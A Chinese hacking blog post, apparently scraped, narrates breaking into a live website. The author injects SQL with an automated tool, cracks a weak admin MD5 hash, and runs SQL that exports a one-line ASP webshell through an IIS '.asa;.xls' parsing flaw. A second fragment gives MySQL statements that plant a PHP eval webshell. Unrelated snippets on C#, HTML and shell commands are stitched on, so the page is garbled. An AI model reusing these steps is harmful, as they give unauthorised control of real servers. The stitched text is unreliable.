目標站:
我艹,開頭太簡單了,直接啊d
搞定一切,就連
tm的管理員
md5還那麼弱智,讓我跑出來了,囸!直接進後台:
看到資料庫備份我笑了,哈哈哈!老方法本地備份突破下,結果發現丫的不行!目錄是唯讀的。
不過圖1中有執行
sql語句,重點來了:
執行**:
1.create table cmd (a varchar(50))
2.insert into cmd (a) values (『』)
3.select * into [a] in 』d:\wwwroot\m3loee.asa;.xls』 』excel 4.0;』 from cmd;
4.drop table cmd;
解釋下:
1.create table cmd (a varchar(50)) 建立乙個有乙個
a欄位的表 表名為
cmd欄位型別為字元 長度為50
2.insert into cmd (a) values (『』) 在表
cmd的
a欄位插入密碼為
#的一句話木馬
3.select * into [a] in 』d:\wwwroot\m3loee.asa;.xls』 』excel 4.0;』 from cmd 把錶
cmd的內容匯出為物理路徑的乙個
excel
檔案,為
什麼用excel
檔案,因為
access
資料庫不允許匯出其他危險格式。我們匯出為
excel
後在利用
iis解析漏洞就可以變成我們的小馬了。
4.drop table cmd 刪表.
理論知識是有的,但是就是差乙個實際的**來練練手了,畢竟搭的站缺乏真實感,就像帶著durex make love
一樣。
語句執行完畢後,興匆匆地菜刀去連,提示404
?****!
又執行了幾次,確認語句沒錯後,覺得可能是菜刀的問題(不支援
execute
,只支援
eval
?)然後就是拼命地翻硬碟,翻啊翻。終於找到了乙個
php、
asp通用的:
傳乙個小馬:
大馬傳過了,元件刪,aspx不支援,
php不支援,第三方應用程式未嘗試。只是記載下
acc匯出一句話拿
shell
。
mysql 匯出一句話 MySQL 匯出一句話
drop table if exists temp 如果存在temp就刪掉 create table temp cmd text not null 建立temp表,裡面就乙個cmd欄位 insert into temp cmd values php eval post cmd 把一句話木馬插入到te...
一句話提醒
1 在c 中,父窗體要訪問子窗體變數,需將子窗體變數設為public才能訪問。2 每 5 秒重新整理頁面 5 秒後重定向頁面 3 block 此元素將顯示為塊級元素,此元素前後會帶有換行符。inline 預設。此元素會被顯示為內聯元素,元素前後沒有換行符。4 document.getelementb...
一句話命令
bash 型別 wget r nc np 分片20m 上傳 bypy vvv s 20m upload mac下檢視埠占用 nettop nm tcp brew brew uninstall zsh brew services list brew services start brew servic...